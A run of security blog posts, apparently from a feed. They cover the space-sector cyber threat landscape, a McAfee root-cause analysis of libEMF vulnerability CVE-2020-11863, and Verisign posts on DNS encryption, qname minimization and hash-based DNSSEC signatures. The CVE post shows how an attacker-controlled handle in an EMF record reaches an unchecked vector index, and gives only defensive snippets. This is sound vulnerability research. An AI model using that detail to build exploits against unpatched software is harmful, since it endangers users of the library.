What is the Fourth Industrial Revolution? The original industrial revolution started with the invention of the steam engine, followed by electricity, computers and communication technology. Industry 4.0 is about creating a diverse, safe, healthy, just world with clean air, water, soil and energy, as well as finding a way to pave the path for the innovations of tomorrow.

The first space era, or Space 1.0, was the study of astronomy, followed by the Apollo moon landings and then the inception of the International Space Station (ISS). Space 4.0 is analogous to Industry 4.0, which is considered the unfolding fourth industrial revolution of manufacturing and services. Traditionally, access to space has been the domain of governments and large space agencies (such as NASA or the European Space Agency) due to the large costs involved in the development, deployment and operation of satellites. In recent years, a new approach to using space for commercial, economic and societal good has been driven by private enterprises in what is termed New Space. When combined with the more traditional approach to space activity, the term “Space 4.0” is used. Space 4.0 is applicable across a wide range of vertical domains, including but not limited to:

  • Ubiquitous broadband
  • Autonomous vehicles
  • Earth observation
  • Disaster mitigation/relief
  • Human spaceflight
  • Exploration

Cyber Threat Landscape Review

The Cyber Threat Landscape has evolved greatly over the past 20 years with the convergence of Information Technology (IT), Operational Technology (OT) and IoT. Protecting consumers, enterprises and critical infrastructure while technology and cybercriminals innovate rapidly in parallel is a constant challenge. While technology and attacks evolve rapidly, the cybercriminal motive remains constant: make money and maximize profit by exploiting a combination of users and technology.

Cybercriminals have far more capability now than they did 10 years ago due to the rise of Cybercrime as a Service (CaaS). Once an exploit for a vulnerability has been developed, it can be weaponized into an exploit kit or a ransomware worm such as WannaCry. Cybercriminals will follow the path of least resistance to achieve their goal of making money.

Nearly every device class across the business verticals, ranging from medical devices to space very-small-aperture terminals (VSATs), has been hacked by security researchers, as is evident from Blackhat and Defcon trends.

From a technology stack perspective (hardware and software) there have been vulnerabilities discovered and exploits developed across all layers where we seek to establish some form of trustworthiness when connected to the internet; browsers, operating systems, protocols, hypervisors, enclaves, cryptographic implementations, system on chips (SoC) and processors.

Not all these vulnerabilities and exploits become weaponized by cybercriminals, but it does highlight the fact that the potential exists. Some notable weaponized exploits are:

  1. Stuxnet worm
  2. WannaCry ransomware worm
  3. Triton malware
  4. Mirai Botnet

Some recent major industry vulnerabilities were: BlueKeep (Windows RDP Protocol), SMBGhost (Windows SMB Protocol), Ripple20 (Treck embedded TCP/IP library), Urgent 11 (VxWorks TCP/IP library), Heartbleed (OpenSSL library), Cloudbleed (Cloudflare), Curveball (Microsoft Crypto API), Meltdown and Spectre (Processor side channels).

Cybercriminals will adapt quickly to maximize their profit as we saw with the COVID-19 pandemic and the mass remote workforce. They will quickly understand the operating environment changes and how they can reach their goals by exploiting users and technology, whichever is the weakest link. The easiest entry point into an organization will be through identity theft or weak passwords being used in remote access protocols such as RDP.

Cybercriminals moved to the Dark Web to hide their identities and the physical locations of their servers, or use bulletproof hosting providers for their infrastructure. What if these services are hosted in space? Who is the legal entity, and who is responsible?

McAfee Enterprise Supernova Cloud analysis reports that:

  • Nearly one in 10 files shared in the cloud with sensitive data have public access, an increase of 111% year over year
  • One in four companies have had their sensitive data downloaded from the cloud to an unmanaged personal device, where they cannot see or control what happens to the data
  • 91% of cloud services do not encrypt data at rest
  • Less than 1% of cloud services allow encryption with customer-managed keys

The transition to the cloud, when done securely, is the right business decision. However, when not done securely it can leave your services and data/data lakes accessible to the public through misconfigurations (shared responsibility model), insecure APIs, and identity and access management issues. Attackers will always go for the low hanging fruit such as open AWS buckets and credentials through vendors in the supply chain.

One of the key initiatives, and now an industry benchmark, is the MITRE ATT&CK framework, which enumerates the TTPs from real-world incidents across Enterprise (Endpoint and Cloud), Mobile and ICS. This framework has proved very valuable in enabling organizations to understand adversary TTPs and the corresponding protect, detect and response controls required in their overall defense security architecture. We may well see a version of MITRE ATT&CK evolve for Space 4.0.

Space Cyber Threat Landscape Review

Threat actors know no boundaries as we have seen criminals move from traditional crime to cybercrime using whatever means necessary to make money. Likewise, technology communication traverses many boundaries across land, air, sea and space. With the reduced costs to entry and the commercial opportunities with Space 4.0 big data, we expect to see cybercriminals innovating within this huge growth area. The Cyber Threat Landscape can be divided into vulnerabilities discovered by security researchers and actual attacks reported in the wild. This allows us to understand the technologies within the space ecosystem that are known to contain vulnerabilities and what capabilities threat actors have and are using in the wild.

Vulnerabilities discovered to date have been within VSAT terminal systems and in the interception of communications. As figure 1 below shows, no vulnerabilities have been disclosed on actual satellites.

Figure 1 – Security Researcher space vulnerability disclosures

To date, satellites have mostly been controlled by governments and the military, so little information is available as to whether an actual satellite has been hacked. We expect to see that change with Space 4.0, as these satellites will be more accessible for security analysis from a hardware and software perspective. Figure 2 below highlights reported attacks in the wild.

Figure 2 – Reported Attacks in the Wild

In McAfee’s recent threat research, “Operation North Star”, we observed an increase in malicious cyber activity targeting the Aerospace and Defense industry. The objective of these campaigns was to gather information on specific programs and technologies.

Since the introduction of the cloud, it seems everything has become a device that interacts with a service; even cybercriminals have been adapting to the service model. Space 4.0 is no different, as we start to see the adoption of the Ground Station as a Service (GSaaS) and Satellite as a Service (SataaS) models per figure 3 below. These services are emerging in the space sector as the vendors accelerating into Space 4.0 look to keep their costs down. Like any new ecosystem, this will bring new attack surfaces and challenges, which we will discuss in the Space 4.0 Threat Modeling section in part 2.

Figure 3 – New Devices and Services for Space 4.0

So, with the introduction of cheap satellites using commercial off-the-shelf (COTS) components and new cloud services is it just a matter of time before we see mass satellite attacks and compromise?

Space 4.0 Data Value

The global space industry grew at an average rate of 6.7% per year between 2005 and 2017 and is projected to rise from its current value of $350 billion to $1.3 trillion per annum by 2030. This rise is driven by new technologies and business models which have increased the number of stakeholders and the application domains which they service in a cost-effective way. The associated increase in data volume and complexity has, among other developments, resulted in increasing concerns over the security and integrity of data transfer and storage between satellites, and between ground stations and satellites.

The McAfee Supernova report shows that data is exploding out of enterprises and into the cloud. We are now going to see the same explosion from Space 4.0 to the cloud as vendors race to innovate and monetize data from low cost satellites in LEO.

According to Microsoft, the processing of data collected from space at cloud scale to observe the Earth will be “instrumental in helping address global challenges such as climate change and furthering of scientific discovery and innovation”. The value of data from space must be viewed from the perspective of the public and private vendors who produce and consume such data. Now that satellite launch costs have come down, producing this data becomes more accessible to commercial markets, so we are going to see much innovation in data analytics to improve our lives, safety and the preservation of the earth. This data can be used to improve emergency response times and save lives, monitor illegal trafficking, cover aviation tracking blind spots, support government scientific research and academic research, improve supply chains and monitor the earth’s evolution, such as climate change effects. Depending on the use case, this data may need to be confidential, may have privacy implications where tracking is involved, and may have substantial value in the context of new markets, innovation and state-level research. It is very clear that data from space will have much value as new markets evolve, and cybercriminals will most certainly target that data, with the intent to hold organizations to ransom or to sell data and analytics innovation to competitors seeking to avoid launch costs. Whatever the use case and value of the data traveling through space, we need to ensure that it moves securely, by providing a trustworthy end-to-end ecosystem.

As we progress towards the sixth digital era, our society, lives and connectivity will become very dependent on off-planet data and technology in space, starting with SataaS.

In Part 2 we will discuss remote computers in Space, the Space 4.0 threat model and what we must do to secure Space 4.0 moving forward.

McAfee would like to thank Cork Institute of Technology (CIT) and its Blackrock Castle Observatory (BCO) and the National Space Center (NSC) in Cork, Ireland for their collaboration in our mission to secure Space 4.0.

The post Securing Space 4.0 – One Small Step or a Giant Leap? Part 1 appeared first on McAfee Blogs.

Vulnerability Discovery in Open Source Libraries: Analyzing CVE-2020-11863

By Chintan Shah

Open source projects are the building blocks of any software development process. As we indicated in our previous blog, as more and more products use open source code, an increase in the overall attack surface is inevitable, especially when open source code is not audited before use. Hence, it is recommended to test it thoroughly for potential vulnerabilities and to collaborate with developers to fix them, eventually mitigating the attacks. We also indicated that we were researching graphics libraries in Windows and Linux, reporting multiple vulnerabilities in Windows GDI as well as in the Linux vector graphics library libEMF. We are still auditing many other Linux graphics libraries, since much of this is legacy code that has not been strictly tested before.

In part 1 of this blog series, we described in detail the significance of open source research, outlining the vulnerabilities we reported in the libEMF library. We also highlighted the importance of compiling the code with memory sanitizers and how that can help detect a variety of memory corruption bugs. In summary, the Address Sanitizer (ASAN) intercepts memory allocation/deallocation functions like malloc()/free() and fills the memory with the respective fill bytes (malloc_fill_byte/free_fill_byte). It also monitors reads and writes to these memory locations, helping detect erroneous access at run time.

In this blog, we provide a more detailed analysis for one of the reported vulnerabilities, CVE-2020-11863, which was due to the use of uninitialized memory. This vulnerability is related to CVE-2020-11865, a global object vector out of bounds memory access in the GlobalObject::Find() function in libEMF. However, the crash call stack turned out to be different, which is why we decided to examine this further and produce this deep dive blog.

The information provided by the ASAN was sufficient to reproduce the vulnerability crash outside of the fuzzer. From the ASAN information, the vulnerability appeared to be a null pointer dereference, but this was not the actual root cause, as we will discuss below.

Looking at the call stack, it appears that the application crashed while dynamically casting the object, for which there could be multiple reasons. Of the likely ones, either the application attempted to access a non-existent virtual table pointer, or the object address returned from the function was a wild address that was accessed when the application crashed. To get more context about this crash, we examined the registers while debugging and came across an interesting value. Below is the crash point in the disassembly, indicating the non-existent memory access.

If we look at the state of the registers at the crash point, it is particularly interesting to note that the register rdi has an unusual value of 0xbebebebebebebebe. We wanted to dig a little deeper into how this value got into the register, resulting in the wild memory access. Since we had the source of the library, we could check right away what this register meant in terms of accessing the objects in memory.

Referring to the Address Sanitizer documentation, it turns out that ASAN writes 0xbe to newly allocated memory by default, essentially meaning this 64-bit value was written but the memory was never initialized. ASAN calls this the malloc_fill_byte. It likewise fills memory with the free_fill_byte when it is freed. This eventually helps identify memory access errors.
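When triaging crashes, recognizable fill patterns like this are a quick signal. A trivial helper, assuming ASAN’s default 0xbe malloc fill byte, might look like:

```python
def looks_like_asan_malloc_fill(value: int, width: int = 8) -> bool:
    """True if a register/pointer value matches ASAN's default 0xbe malloc
    fill pattern, i.e. memory that was allocated but never initialized."""
    return value == int.from_bytes(b"\xbe" * width, "big")

assert looks_like_asan_malloc_fill(0xbebebebebebebebe)
```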

This behavior of ASAN can also be verified in the libsanitizer source here. Below is an excerpt from the source file.

Looking at the stack trace at the crash point, as shown below, the crash occurred in the SelectObject() function. This part of the code is responsible for processing the EMR_SELECTOBJECT record structure of the Enhanced Metafile (EMF) file, and the graphics object handle passed to the function is 0x80000018. We wanted to investigate the flow of the code to check whether this value comes directly from the input EMF file and can be controlled by an attacker.

In the SelectObject() function, while processing the EMR_SELECTOBJECT record structure, the handle to the GDI object is passed to GlobalObjects.find() as shown in the above code snippet. That function accesses the global stock object vector by masking the high-order bit off the GDI object handle and converting the result into an index, eventually returning the stock object reference at the converted index in the object vector. Stock object enumeration specifies the indexes of predefined logical graphics objects that can be used in graphics operations, as documented in the MS documentation. For instance, if the object handle is 0x80000018, it will be ANDed with 0x7FFFFFFF, resulting in 0x18, which will be used as the index into the global stock object vector. This stock object reference is then dynamically cast into the graphics object, after which the EMF::GRAPHICSOBJECT member function getType() is called to determine the type of the graphics object; later in this function, the reference is again cast into an appropriate graphics object (BRUSH, PEN, FONT, PALETTE, EXTPEN), as shown in the code snippet below.

EMF::GRAPHICSOBJECT is the class derived from EMF::OBJECT and the inheritance diagram of the EMF::OBJECT class is as shown below.

However, as mentioned earlier, we were interested in knowing whether the object handle, passed as an argument to the SelectObject() function, can be controlled by an attacker. To get context on this, let us look at the format of the EMR_SELECTOBJECT record, as shown below.

As we notice here, ihObject is the 4-byte unsigned integer specifying the index into the stock object enumeration. In this case the stock object references are maintained in the global object vector. Here, the object handle of 0x80000018 implies that index 0x18 will be used to access the global stock object vector. If the length of the object vector is less than 0x18 and no length check is done prior to accessing the vector, the result is an out-of-bounds memory access.
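A Python sketch of the record handling makes the missing check obvious. The field layout follows the documented EMR_SELECTOBJECT structure (Type, Size, ihObject, all 32-bit little-endian); the function and variable names are ours, and the explicit length test is precisely what the vulnerable path lacked:

```python
import struct

STOCK_OBJECT_FLAG = 0x80000000

def select_object(record: bytes, stock_objects: list):
    # EMR_SELECTOBJECT body: Type (4 bytes), Size (4 bytes), ihObject (4 bytes).
    if len(record) < 12:
        raise ValueError("record too short for EMR_SELECTOBJECT")
    rec_type, size, ih_object = struct.unpack_from("<III", record, 0)
    if ih_object & STOCK_OBJECT_FLAG:
        index = ih_object & 0x7FFFFFFF      # e.g. 0x80000018 -> 0x18 (24)
        if index >= len(stock_objects):     # the missing bounds check
            raise IndexError(f"stock object index {index} out of range")
        return stock_objects[index]
    return None  # non-stock handles come from the EMF object table (omitted)
```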

Below is the visual representation of processing the EMR_SELECTOBJECT metafile record.

While debugging this issue, we set a breakpoint at GlobalObjects.find() and continue until we have object handle 0x80000018; essentially, we reach the point where the highlighted EMR_SELECTOBJECT record above is being processed. As shown below, the object handle is converted into the index (0x18 = 24) used to access the object vector of size 0x16 (22), resulting in the out-of-bounds access we reported as CVE-2020-11865.

Further stepping into the code, we enter the STL vector library stl_vector.h, which implements the dynamic expansion of std::vector. Since the object vector at this point has only 22 elements, the STL vector is expanded to the size indicated by the highlighted parameter; the vector is then accessed at the passed index, returning the value at that object reference which, as shown in the code snippet below, comes out to be 0xbebebebebebebebe, the fill value written by ASAN.


The code uses std::allocator to manage the vector memory, primarily for memory allocation and deallocation. On further analysis, it turns out that the value returned, 0xbebebebebebebebe in this case, is the virtual pointer of the non-existent stock object, which is dereferenced during dynamic casting, resulting in the crash.

As mentioned in our earlier blog, the fixes to the library have been released in a subsequent version, available here.

Conclusion

While using third party code in products certainly saves time and increases development speed, it potentially comes with an increase in the volume of vulnerabilities, especially when the code remains unaudited and integrated into products without any testing. It is extremely critical to perform fuzz testing of the open source libraries used, which can help in discovering vulnerabilities earlier in the development cycle and provides an opportunity to fix them before the product is shipped, consequently mitigating attacks. However, as we emphasized in our previous blog, it is critical to strengthen the collaboration between vulnerability researchers and the open source community to continue responsible disclosures, allowing the maintainers of the code to address them in a timely fashion.

The post Vulnerability Discovery in Open Source Libraries: Analyzing CVE-2020-11863 appeared first on McAfee Blogs.

Information Protection for the Domain Name System: Encryption and Minimization

By Burt Kaliski

This is the final in a multi-part series on cryptography and the Domain Name System (DNS).

In previous posts in this series, I’ve discussed a number of applications of cryptography to the DNS, many of them related to the Domain Name System Security Extensions (DNSSEC).

In this final blog post, I’ll turn attention to another application that may appear at first to be the most natural, though as it turns out, may not always be the most necessary: DNS encryption. (I’ve also written about DNS encryption as well as minimization in a separate post on DNS information protection.)

DNS Encryption

In 2014, the Internet Engineering Task Force (IETF) chartered the DNS PRIVate Exchange (dprive) working group to start work on encrypting DNS queries and responses exchanged between clients and resolvers.

That work resulted in RFC 7858, published in 2016, which describes how to run the DNS protocol over the Transport Layer Security (TLS) protocol, also known as DNS over TLS, or DoT.

DNS encryption between clients and resolvers has since gained further momentum, with multiple browsers and resolvers supporting DNS over Hypertext Transfer Protocol Secure (HTTPS), or DoH, with the formation of the Encrypted DNS Deployment Initiative, and with further enhancements such as oblivious DoH.
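As a quick illustration of what a client-side encrypted lookup looks like, the sketch below issues an A-record query over DoH. It assumes the dnspython library (version 2.0 or later, which provides dns.query.https, with an HTTP backend such as requests installed) and a public DoH resolver endpoint:

```python
import dns.message
import dns.query

# Build a standard DNS query and send it over HTTPS instead of plaintext port 53.
query = dns.message.make_query("example.com", "A")
response = dns.query.https(query, "https://1.1.1.1/dns-query")
for rrset in response.answer:
    print(rrset)
```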

The dprive working group turned its attention to the resolver-to-authoritative exchange during its rechartering in 2018. And in October of last year, ICANN’s Office of the CTO published its strategy recommendations for the ICANN-managed Root Server (IMRS, i.e., the L-Root Server), an effort motivated in part by concern about potential “confidentiality attacks” on the resolver-to-root connection.

From a cryptographer’s perspective the prospect of adding encryption to the DNS protocol is naturally quite interesting. But this perspective isn’t the only one that matters, as I’ve observed numerous times in previous posts.

Balancing Cryptographic and Operational Considerations

A common theme in this series on cryptography and the DNS has been the question of whether the benefits of a technology are sufficient to justify its cost and complexity.

This question came up not only in my review of two newer cryptographic advances, but also in my remarks on the motivation for two established tools for providing evidence that a domain name doesn’t exist.

Recall that the two tools — the Next Secure (NSEC) and Next Secure 3 (NSEC3) records — were developed because a simpler approach didn’t have an acceptable risk/benefit tradeoff. In the simpler approach, to provide a relying party assurance that a domain name doesn’t exist, a name server would return a response, signed with its private key, “<name> doesn’t exist.”

From a cryptographic perspective, the simpler approach would meet its goal: a relying party could then validate the response with the corresponding public key. However, the approach would introduce new operational risks, because the name server would now have to perform online cryptographic operations.

The name server would not only have to protect its private key from compromise, but would also have to protect the cryptographic operations from overuse by attackers. That could open another avenue for denial-of-service attacks that could prevent the name server from responding to legitimate requests.

The designers of DNSSEC mitigated these operational risks by developing NSEC and NSEC3, which gave the option of moving the private key and the cryptographic operations offline, into the name server’s provisioning system. This better solution balanced cryptography and operations. The theme is now returning to view through the recent efforts around DNS encryption.

Like the simpler initial approach for authentication, DNS encryption may meet its goal from a cryptographic perspective. But the operational perspective is important as well. As designers again consider where and how to deploy private keys and cryptographic operations across the DNS ecosystem, alternatives with a better balance are a desirable goal.

Minimization Techniques

In addition to encryption, there has been research into other, possibly lower-risk alternatives that can be used in place of or in addition to encryption at various levels of the DNS.

We call these techniques collectively minimization techniques.

Qname Minimization

In “textbook” DNS resolution, a resolver sends the same full domain name to a root server, a top-level domain (TLD) server, a second-level domain (SLD) server, and any other server in the chain of referrals, until it ultimately receives an authoritative answer to a DNS query.

This is the way that DNS resolution has been practiced for decades, and it’s also one of the reasons for the recent interest in protecting information on the resolver-to-authoritative exchange: The full domain name is more information than all but the last name server needs to know.

One such minimization technique, known as qname minimization, was identified by Verisign researchers in 2011 and documented in RFC 7816 in 2016. (In 2015, Verisign announced a royalty-free license to its qname minimization patents.)

With qname minimization, instead of sending the full domain name to each name server, the resolver sends only as much as the name server needs either to answer the query or to refer the resolver to a name server at the next level. This follows the principle of minimum disclosure: the resolver sends only as much information as the name server needs to “do its job.” As Matt Thomas described in his recent blog post on the topic, nearly half of all .com and .net queries received by Verisign’s .com TLD servers were in a minimized form as of August 2020.
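A minimal sketch of the idea, assuming fully qualified names and ignoring the empty non-terminal and query-type subtleties that RFC 7816 discusses (the function name is ours):

```python
def minimized_qname(full_name: str, zone: str) -> str:
    """Return the minimal query name to send to a server authoritative for
    `zone`: one label more than the zone itself (the principle of RFC 7816)."""
    labels = full_name.rstrip(".").split(".")
    zone_part = zone.rstrip(".")
    zone_labels = zone_part.split(".") if zone_part else []
    keep = len(zone_labels) + 1
    return ".".join(labels[-keep:]) + "."

# Resolving www.example.com step by step:
print(minimized_qname("www.example.com", "."))    # "com."          -> to a root server
print(minimized_qname("www.example.com", "com"))  # "example.com."  -> to a TLD server
```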

Additional Minimization Techniques

Other techniques that are part of this new chapter in DNS protocol evolution include NXDOMAIN cut processing [RFC 8020] and aggressive DNSSEC caching [RFC 8198]. Both leverage information present in the DNS to reduce the amount and sensitivity of DNS information exchanged with authoritative name servers. In aggressive DNSSEC caching, for example, the resolver analyzes NSEC and NSEC3 range proofs obtained in response to previous queries to determine on its own whether a domain name doesn’t exist. This means that the resolver doesn’t always have to ask the authoritative server system about a domain name it hasn’t seen before.
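The sketch below shows the essence of the aggressive-caching check: a cached, validated NSEC record proves the non-existence of any name that sorts strictly between its owner and next names. The ordering used here is a simplified version of the canonical ordering in RFC 4034; a real resolver must also handle escaped and binary labels.

```python
def canonical_key(name: str):
    """Simplified canonical ordering key (after RFC 4034, section 6.1):
    compare labels right to left, case-insensitively."""
    labels = name.rstrip(".").split(".")
    return tuple(label.lower().encode() for label in reversed(labels))

def nsec_proves_nonexistence(owner: str, next_name: str, qname: str) -> bool:
    """An NSEC record covering [owner, next) proves qname does not exist
    if qname sorts strictly between the two names."""
    return canonical_key(owner) < canonical_key(qname) < canonical_key(next_name)

# A cached NSEC record "alpha.example. NSEC delta.example. ..." also answers a
# later query for bravo.example without contacting the authoritative server:
assert nsec_proves_nonexistence("alpha.example.", "delta.example.", "bravo.example.")
```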

All of these techniques, as well as additional minimization alternatives I haven’t mentioned, have one important common characteristic: they only change how the resolver operates during the resolver-authoritative exchange. They have no impact on the authoritative name server or on other parties during the exchange itself. They thereby mitigate disclosure risk while also minimizing operational risk.

The resolver’s exchanges with authoritative name servers, prior to minimization, were already relatively less sensitive because they represented aggregate interests of the resolver’s many clients[1]. Minimization techniques lower the sensitivity even further at the root and TLD levels: the resolver sends only its aggregate interests in TLDs to root servers, and only its interests in SLDs to TLD servers. The resolver still sends the aggregate interests in full domain names at the SLD level and below[2], and may also include certain client-related information at these levels, such as the client-subnet extension. The lower levels therefore may have different protection objectives than the upper levels.

Conclusion

Minimization techniques and encryption together give DNS designers additional tools for protecting DNS information — tools that when deployed carefully can balance between cryptographic and operational perspectives.

These tools complement those I’ve described in previous posts in this series. Some have already been deployed at scale, such as DNSSEC with its NSEC and NSEC3 non-existence proofs. Others are at various earlier stages, like NSEC5 and tokenized queries, and still others contemplate “post-quantum” scenarios and how to address them. (And there are yet other tools that I haven’t covered in this series, such as authenticated resolution and adaptive resolution.)

Modern cryptography is just about as old as the DNS. Both have matured since their introduction in the late 1970s and early 1980s respectively. Both bring fundamental capabilities to our connected world. Both continue to evolve to support new applications and to meet new security objectives. While they’ve often moved forward separately, as this blog series has shown, there are also opportunities for them to advance together. I look forward to sharing more insights from Verisign’s research in future blog posts.

Read the complete six blog series:

  1. The Domain Name System: A Cryptographer’s Perspective
  2. Cryptographic Tools for Non-Existence in the Domain Name System: NSEC and NSEC3
  3. Newer Cryptographic Advances for the Domain Name System: NSEC5 and Tokenized Queries
  4. Securing the DNS in a Post-Quantum World: New DNSSEC Algorithms on the Horizon
  5. Securing the DNS in a Post-Quantum World: Hash-Based Signatures and Synthesized Zone Signing Keys
  6. Information Protection for the Domain Name System: Encryption and Minimization

1. This argument obviously holds more weight for large resolvers than for small ones — and doesn’t apply for the less common case of individual clients running their own resolvers. However, small resolvers and individual clients seeking additional protection retain the option of sending sensitive queries through a large, trusted resolver, or through a privacy-enhancing proxy. The focus in our discussion is primarily on large resolvers.

2. In namespaces where domain names are registered at the SLD level, i.e., under an effective TLD, the statements in this note about “root and TLD” and “SLD level and below” should be “root through effective TLD” and “below effective TLD level.” For simplicity, I’ve placed the “zone cut” between TLD and SLD in this note.

The post Information Protection for the Domain Name System: Encryption and Minimization appeared first on Verisign Blog.

Securing the DNS in a Post-Quantum World: Hash-Based Signatures and Synthesized Zone Signing Keys

By Burt Kaliski

This is the fifth in a multi-part series on cryptography and the Domain Name System (DNS).

In my last article, I described efforts underway to standardize new cryptographic algorithms that are designed to be less vulnerable to potential future advances in quantum computing. I also reviewed operational challenges to be considered when adding new algorithms to the DNS Security Extensions (DNSSEC).

In this post, I’ll look at hash-based signatures, a family of post-quantum algorithms that could be a good match for DNSSEC from the perspective of infrastructure stability.

I’ll also describe Verisign Labs research into a new concept called synthesized zone signing keys that could mitigate the impact of the large signature size for hash-based signatures, while still maintaining this family’s protections against quantum computing.

(Caveat: The concepts reviewed in this post are part of Verisign’s long-term research program and do not necessarily represent Verisign’s plans or positions on new products or services. Concepts developed in our research program may be subject to U.S. and/or international patents and/or patent applications.)

A Stable Algorithm Rollover

The DNS community’s root key signing key (KSK) rollover illustrates how complicated a change to DNSSEC infrastructure can be. Although successfully accomplished, this change was delayed by ICANN to ensure that enough resolvers had the public key required to validate signatures generated with the new root KSK private key.

Now imagine the complications if the DNS community also had to ensure that enough resolvers not only had a new key but also had a brand-new algorithm.

Imagine further what might happen if a weakness in this new algorithm were to be found after it was deployed. While there are procedures for emergency key rollovers, emergency algorithm rollovers would be more complicated, and perhaps controversial as well if a clear successor algorithm were not available.

I’m not suggesting that any of the post-quantum algorithms that might be standardized by NIST will be found to have a weakness. But confidence in cryptographic algorithms can be gained and lost over many years, sometimes decades.

From the perspective of infrastructure stability, therefore, it may make sense for DNSSEC to have a backup post-quantum algorithm built in from the start — one for which cryptographers already have significant confidence and experience. This algorithm might not be as efficient as other candidates, but there is less of a chance that it would ever need to be changed. This means that the more efficient candidates could be deployed in DNSSEC with the confidence that they have a stable fallback. It’s also important to keep in mind that the prospect of quantum computing is not the only reason system developers need to be considering new algorithms from time to time. As public-key cryptography pioneer Martin Hellman wisely cautioned, new classical (non-quantum) attacks could also emerge, whether or not a quantum computer is realized.

Hash-Based Signatures

The 1970s were a foundational time for public-key cryptography, producing not only the RSA algorithm and the Diffie-Hellman algorithm (which also provided the basic model for elliptic curve cryptography), but also hash-based signatures, invented in 1979 by another public-key cryptography founder, Ralph Merkle.

Hash-based signatures are interesting because their security depends only on the security of an underlying hash function.

It turns out that hash functions, as a concept, hold up very well against quantum computing advances — much better than currently established public-key algorithms do.

This means that Merkle’s hash-based signatures, now more than 40 years old, can rightly be considered the oldest post-quantum digital signature algorithm.

If it turns out that an individual hash function doesn’t hold up — whether against a quantum computer or a classical computer — then the hash function itself can be replaced, as cryptographers have been doing for years. That will likely be easier than changing to an entirely different post-quantum algorithm, especially one that involves very different concepts.

The conceptual stability of hash-based signatures is a reason that interoperable specifications are already being developed for variants of Merkle’s original algorithm. Two approaches are described in RFC 8391, “XMSS: eXtended Merkle Signature Scheme” and RFC 8554, “Leighton-Micali Hash-Based Signatures.” Another approach, SPHINCS+, is an alternate in NIST’s post-quantum project.

Figure 1. Conventional DNSSEC signatures. DNS records are signed with the ZSK private key, and are thereby “chained” to the ZSK public key. The digital signatures may be hash-based signatures.

Hash-based signatures can potentially be applied to any part of the DNSSEC trust chain. For example, in Figure 1, the DNS record sets can be signed with a zone signing key (ZSK) that employs a hash-based signature algorithm.

The main challenge with hash-based signatures is that the signature size is large, on the order of tens or even hundreds of thousands of bits. This is perhaps why they haven’t seen significant adoption in security protocols over the past four decades.

Synthesizing ZSKs with Merkle Trees

Verisign Labs has been exploring how to mitigate the size impact of hash-based signatures on DNSSEC, while still basing security on hash functions only in the interest of stable post-quantum protections.

One of the ideas we’ve come up with uses another of Merkle’s foundational contributions: Merkle trees.

Merkle trees authenticate multiple records by hashing them together in a tree structure. The records are the “leaves” of the tree. Pairs of leaves are hashed together to form a branch, then pairs of branches are hashed together to form a larger branch, and so on. The hash of the largest branches is the tree’s “root.” (This is a data-structure root, unrelated to the DNS root.)

Each individual leaf of a Merkle tree can be authenticated by retracing the “path” from the leaf to the root. The path consists of the hashes of each of the adjacent branches encountered along the way.

Authentication paths can be much shorter than typical hash-based signatures. For instance, with a tree depth of 20 and a 256-bit hash value, the authentication path for a leaf would only be 5,120 bits long, yet a single tree could authenticate more than a million leaves.
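Here is a minimal sketch of that mechanic, assuming SHA-256 and, for brevity, a power-of-two number of leaves: build the tree, extract a leaf’s authentication path, and retrace the path to the root.

```python
# Minimal Merkle tree: compute a root over record sets, then verify one
# record via its authentication path. Assumes len(leaves) is a power of two.
import hashlib

def H(b: bytes) -> bytes:
    return hashlib.sha256(b).digest()

def build_tree(leaves):
    # levels[0] holds the leaf hashes; the final level holds the single root.
    levels = [[H(leaf) for leaf in leaves]]
    while len(levels[-1]) > 1:
        prev = levels[-1]
        levels.append([H(prev[i] + prev[i + 1]) for i in range(0, len(prev), 2)])
    return levels

def auth_path(levels, index):
    # The sibling hash at each level, from the leaves up to (not including) the root.
    path = []
    for level in levels[:-1]:
        path.append(level[index ^ 1])
        index //= 2
    return path

def verify(root, leaf, index, path):
    node = H(leaf)
    for sibling in path:
        node = H(node + sibling) if index % 2 == 0 else H(sibling + node)
        index //= 2
    return node == root

records = [b"a.example. A ...", b"b.example. AAAA ...",
           b"c.example. MX ...", b"d.example. TXT ..."]
levels = build_tree(records)
root = levels[-1][0]          # this would be published as the synthesized ZSK
path = auth_path(levels, 2)   # this would serve as the record's "signature"
assert verify(root, records[2], 2, path)
```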

Figure 2. DNSSEC signatures following the synthesized ZSK approach proposed here. DNS records are hashed together into a Merkle tree. The root of the Merkle tree is published as the ZSK, and the authentication path through the Merkle tree is the record’s signature.

Returning to the example above, suppose that instead of signing each DNS record set with a hash-based signature, each record set were considered a leaf of a Merkle tree. Suppose further that the root of this tree were to be published as the ZSK public key (see Figure 2). The authentication path to the leaf could then serve as the record set’s signature.

The validation logic at a resolver would be the same as in ordinary DNSSEC:

  • The resolver would obtain the ZSK public key from a DNSKEY record set signed by the KSK.
  • The resolver would then validate the signature on the record set of interest with the ZSK public key.

The only difference on the resolver’s side would be that signature validation would involve retracing the authentication path to the ZSK public key, rather than a conventional signature validation operation.

The ZSK public key produced by the Merkle tree approach would be a “synthesized” public key, in that it is obtained from the records being signed. This is noteworthy from a cryptographer’s perspective, because the public key wouldn’t have a corresponding private key, yet the DNS records would still, in effect, be “signed by the ZSK!”

Additional Design Considerations

In this type of DNSSEC implementation, the Merkle tree approach only applies to the ZSK level. Hash-based signatures would still be applied at the KSK level, although their overhead would now be “amortized” across all records in the zone.

In addition, each new ZSK would need to be signed “on demand,” rather than in advance, as in current operational practice.

This leads to tradeoffs, such as how many changes to accumulate before constructing and publishing a new tree. Accumulate fewer changes and a new tree can be published sooner; accumulate more and the tree will be larger, so the per-record overhead of the signatures at the KSK level will be lower.
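A quick back-of-the-envelope calculation illustrates the tradeoff; the 8-kilobyte KSK signature assumed here is an illustrative figure in the range of SPHINCS+-style hash-based schemes.

```python
# Back-of-the-envelope amortization: one hash-based KSK signature over the
# Merkle root is shared by every record in the tree. Sizes are illustrative.
KSK_SIG_BITS = 8_000 * 8   # assume an ~8 KB hash-based KSK signature
HASH_BITS = 256            # assume 256-bit hashes in the tree

for leaves in (1_000, 100_000, 1_000_000):
    depth = (leaves - 1).bit_length()   # ceil(log2(leaves))
    path_bits = depth * HASH_BITS       # per-record authentication path
    amortized = KSK_SIG_BITS / leaves   # per-record share of the KSK signature
    print(f"{leaves:>9} leaves: {path_bits:>5}-bit path, "
          f"{amortized:6.1f} bits of amortized KSK signature")
```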

Conclusion

My last few posts have discussed cryptographic techniques that could potentially be applied to the DNS in the long term — or that might not even be applied at all. In my next post, I’ll return to more conventional subjects, and explain how Verisign sees cryptography fitting into the DNS today, as well as some important non-cryptographic techniques that are part of our vision for a secure, stable and resilient DNS.

Read the complete six blog series:

  1. The Domain Name System: A Cryptographer’s Perspective
